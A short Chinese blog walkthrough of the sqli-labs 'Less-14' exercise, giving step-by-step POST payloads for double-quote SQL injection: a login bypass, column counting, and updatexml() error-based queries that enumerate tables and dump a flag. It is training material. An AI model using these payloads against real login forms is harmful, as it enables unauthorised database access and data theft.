Less-14
作者:互联网
Less-14 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)
1.判断是否存在注入
uname=1"&passwd=a&submit=Submit
错误回显 => 存在注入
2.判断参数类型
uname=1 or 1=1#&passwd=a&submit=Submit
无回显
uname=1" or 1=1#&passwd=a&submit=Submit
登录成功 =>字符型
3.进行参数闭合
uname=1" or 1=1#&passwd=a&submit=Submit
登录成功 => 闭合成功
4.查看这个网站后台数据库所在的表有几列
uname=1" order by 2#&passwd=a&submit=Submit
无回显
uname=1" order by 3#&passwd=a&submit=Submit
错误回显 => 有2列
5.进行报错注入,查看所在数据库
uname=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#&passwd=a&submit=Submit
6.查看数据库的表
uname=1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#&passwd=a&submit=Submit
7.查看r1lPpzMz表中的列
uname=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="r1lPpzMz"),0x7e),1)#&passwd=a&submit=Submit
8.查看表中的flag列中的数据
uname=1" and updatexml(1,concat(0x7e,(select flag from r1lPpzMz limit 0,1),0x7e),1)#&passwd=a&submit=Submit
标签:14,Less,passwd,0x7e,#&,submit,uname,Submit 来源: https://www.cnblogs.com/WHOAMI-xiaoyu/p/16057671.html